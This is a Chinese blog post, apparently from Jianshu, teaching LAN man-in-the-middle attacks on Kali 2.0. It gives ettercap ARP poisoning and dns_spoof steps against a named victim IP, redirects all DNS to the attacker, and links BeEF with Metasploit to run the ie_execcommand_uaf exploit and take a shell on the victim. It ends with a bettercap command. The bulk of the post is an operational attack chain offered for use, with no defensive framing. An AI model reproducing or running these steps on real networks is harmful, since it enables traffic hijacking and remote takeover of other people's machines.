kali 2.0下的中间人攻击

图片发自简书App



前言,提起中间人攻击,首先我们会想到老牌的ettercap,今天我们来介绍几种内网中间人攻击的工具

  ettercap,bettercap,mitmf(当然还需要beef和metasploit配合,效果更佳)

  0x01 ettercap

  ettercap是LINUX下一个强大的 欺骗工具,当然WINDOWS也能用,你能够用飞一般的速度创建和发送伪造的包.让你发送从网络适配器到应用软件各种级别的包.绑定监听数据到一个本地端口:从一个客户端连接到这个端口并且能够为不知道的协议解码或者把数据插进去(只有在arp为基础模式里才能用)

  metasploit配合beef+ettercap局域网dns劫持拿shell

  所用工具:metasploit beef ettercap

  首先我们通过

  ettercap -G 打开我们的ettercap工具


图片发自简书App



指定网卡 Sniff -> Unified sniffing -> Ok


然后通过 Hosts->Scan for hosts 扫描一下局域网的机器,通过 Hosts->Hosts list 显示出来,如图


其中 192.168.2.1为网关,192.168.2.105为受害机器

  我们选中192.168.2.105 Add to Target 1

  选中网关 192.168.2.1 Add to Target 2

  如图


选中 Mitm -> Arp poisoning -> 勾选Sniff remote connections 点ok 如图


选中 Plugins -> Manage the Plugins -> 双击 dns_spoof


这样我们就完成了受害机器的dns劫持过程,我们修改一下

  vim /etc/ettercap/etter.dns


使其无论打开什么网址,其实打开的都是 192.168.1.104 ok 一切准备就绪,我们开始运行ettercap 如图:


好了,我们在受害机器了ping一下,看看是否劫持成功


没有问题,所有的网址都没劫持到192.168.2.104上

  接下来,我们使用metasploit 和 beef 工具,利用xp下的ie漏洞拿shell

  刚开始的时候,需要beef和metasploit关联一下

  我们配置一下

  vim /usr/share/beef-xss/config.yaml


开启metasploit 拓展

  然后配置一下拓展下的metasploit配置文件

  vim /usr/share/beef-xss/extensions/metasploit/config.yaml


把ip填写成攻击机器的ip,把metasploit路径填上,保存.

  这就完成了beef和metasploit的关联

  然后把metasploit的服务开启,

  由于使用PostgreSQL作为数据库,因此,必须先运行它。

  root@kali:~# service postgresql start

  启动Metasploit服务

  root@kali:~# service metasploit start

  在命令行下用msfconsole把控制台打开,接着加载beEF。所用命令为:“load msgrpc ServerHost=192.168.2.104 Pass=abc123”


下面我们来启动beef

  cd /usr/share/beef-xss/ ./beef -x

  我们看到 metasploit 已经加载进来了


我们通过 http://192.168.2.104:3000/ui/panel 打开beef界面,用户名和密码都是beef


好了,现在一切都已经准备好,让我们用php编写一个程序,去搞shell吧

  vim /var/www/index.php

  我们再进入msf

  use exploit/windows/browser/ie_execcommand_uaf set SRVHOST 192.168.2.104 set URIPATH / exploit

  这样就完成了监听,一旦目标机器打开网站


给他一个跳转,让它跳转到 http://192.168.2.104:8080

  看一眼我们的metaspolt 已经拿到了


使用sessions -i id号 控制目标机器

  好了 最后一张图 完结 累死


0x02 bettercap

  bBetterCap是一个功能强大、模块化、轻便的MiTM框架,可以用来对网络开展各种类型的中间人攻击(Man-In-The-Middle)。它也可以帮你实时地操作HTTP和HTTPS流量,以及其他更多功能。

  bettercap -I eth0 -X

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 194,457评论 5 459
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 81,837评论 2 371
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 141,696评论 0 319
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 52,183评论 1 263
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 61,057评论 4 355
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 46,105评论 1 272
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 36,520评论 3 381
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 35,211评论 0 253
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 39,482评论 1 290
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 34,574评论 2 309
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 36,353评论 1 326
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 32,213评论 3 312
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 37,576评论 3 298
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 28,897评论 0 17
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 30,174评论 1 250
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 41,489评论 2 341
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 40,683评论 2 335

推荐阅读更多精彩内容

  • 线程 线程是用来执行任务的,线程彻底执行完任务A才能去执行任务B。为了同时执行两个任务,产生了多线程。 进程 进程...
    流水点点阅读 283评论 2 0
  • I’m just a little bit caught in the middle 我有点儿左右为难 Life ...
    67fbaec5208f阅读 210评论 0 0
  • 前几天回到爷爷家随手拍了一些风景 因为不是专业摄影 所以只是自己欣赏 随手一拍的小猫 你需要仔细寻找它 是不是很可...
    浪里个浪Olivia阅读 105评论 0 1